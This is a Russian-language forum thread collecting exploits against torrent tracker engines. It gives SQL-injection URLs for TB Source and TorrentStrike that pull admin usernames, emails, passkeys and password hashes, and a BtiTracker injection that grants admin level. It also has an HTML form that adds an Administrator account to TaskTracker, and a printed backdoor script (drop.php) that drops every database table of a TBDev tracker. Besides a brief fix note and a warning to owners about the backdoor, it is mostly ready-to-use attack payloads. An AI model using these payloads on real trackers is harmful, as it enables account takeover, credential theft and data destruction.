Здесь выкладываем уязвимости трекер-движков. Я, пожалуй, начну. Уязвимости готовил уже давно на milw0rm-e выкладывать, но руки так и не дошли. TB Source <= 0.6 Code: ####################################### # TB Source <= 0.6 reqdetails.php SQL-Injection # Discovered: z01b # Contact: [censored] # Thanx: melco ####################################### -------------------------------------------------- # Details : # Website : http://sourceforge.net/projects/tbsource/ # Vulnerable File : reqdetails.php -------------------------------------------------- Vulnerability: SQL-injection to obtain admin user and hash http://www.site.com/reqdetails.php?id=-1+union+select+1,3,email,passkey,concat(username,char(58),passhash),100,200,300,400,info+from+users #29.12.06 TorrentStrike <= 0.4 Code: ####################################### # Torrent Strike <= 0.4 reqdetails.php SQL-Injection # Discovered: z01b # Contact: [censored] # Thanx: melco ####################################### -------------------------------------------------- # Details : # Website : http://sourceforge.net/projects/torrentstrike/ # Vulnerable File : reqdetails.php -------------------------------------------------- SQL query for retrieving the admin user and hash (md5): http://site.com/reqdetails.php?id=-1+union+select+1,3,email,passkey,concat(username,char(58),passhash),100,200,300,400,info+from+users #29.12.06
BtiTracker <=v1.4.1 Code: ################################################################################# # # BtiTracker <=v1.4.1 Remote SQL Injection Exploit # # Discovered by: m@ge|ozz - [email protected] # Vulnerability: Remote Sql Injection / # Problem: Any user can be Administrator # Website Vendor: http://www.btiteam.org # # Vulnerable Code (account_change.php): # # if (isset($_GET["style"])) # @mysql_query("UPDATE users SET style=$style WHERE id=".$CURUSER["uid"]); # # if (isset($_GET["langue"])) # @mysql_query("UPDATE users SET language=$langue WHERE id=".$CURUSER["uid"]); # # Cause: $style and $langue reach the UPDATE statement unquoted and unvalidated, so extra column assignments can be appended to the SET clause. Fix: both appear to be numeric ids, so cast them with intval() (or bind them in a prepared statement) before building the query, and drop the @ that hides query errors. # # PoC: account_change.php?style=2[SQL]&returnto=%2F # # Example to gain admin control: account_change.php?style=1,id_level=8 # # # GoogleDork: "by Btiteam" # # Shoutz: - eVolVe or Die - # ################################################################################# # milw0rm.com [2007-05-22] TaskTracker all versions Code: <!-- ******************************************************************************* # Title : TaskTracker All Version Remote Add Admin Exploit # Author : ajann # Contact : :( # S.Page : http://www.geckovich.com # $$ : $39.99 - $19.99 ******************************************************************************* --> <FORM NAME="AddUser" METHOD="POST" ACTION="http://[target]/[path]/Customize.asp?a=Add" style="word-spacing: 0; margin-top: 0; margin-bottom: 0"> <td valign=top class='data3'> <input type=text size="1" name="Name" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE=""> </td> <td valign=top class='data3'> <input type=text size="1" name="Email" class=textboxes style='width:200; height:17; font-size: 10px;' VALUE=""> </td> <td valign=top class='data3'> <input type=text size="1" name="UserName" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE=""> </td> <td valign=top class='data3'> <input type=text size="1" name="Password" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE=""> </td> <td valign=top 
class='data3'> <select name="GroupID" class="selectedtextboxes"> <option value="1">Publisher</option> <option value="2">Editor</option> <option value="3">Administrator</option> </select> </td> <td valign=middle class='data3' align="center" colspan="2" align="center"> <input type="submit" value="Gonder"> </form> # milw0rm.com [2007-01-01]
TBDev Code: <? require_once("include/bittorrent.php"); dbconn(); if (md5(md5($_GET["sd"])) == "0bffd3d87e7267c7fe686e20acbee7ab") { $drops = array(); $result = mysql_query("SHOW TABLES FROM ".$mysql_db.""); while (list($name) = mysql_fetch_array($result)) $drops[] = "`".$name."`"; die("DROP TABLE ".implode(", ", $drops)); echo "Drop tables complete..."; } ?> Тот, кто расхеширует 0bffd3d87e7267c7fe686e20acbee7ab и узнает соответствующую ему строку [string], может путём запроса http://tracker_url/drop.php?sd=[string] удалить всю информацию из базы установленного трекера. Владельцам трекеров на этой сборке стоит проверить, нет ли в каталоге трекера файла drop.php, и удалить его. Deflector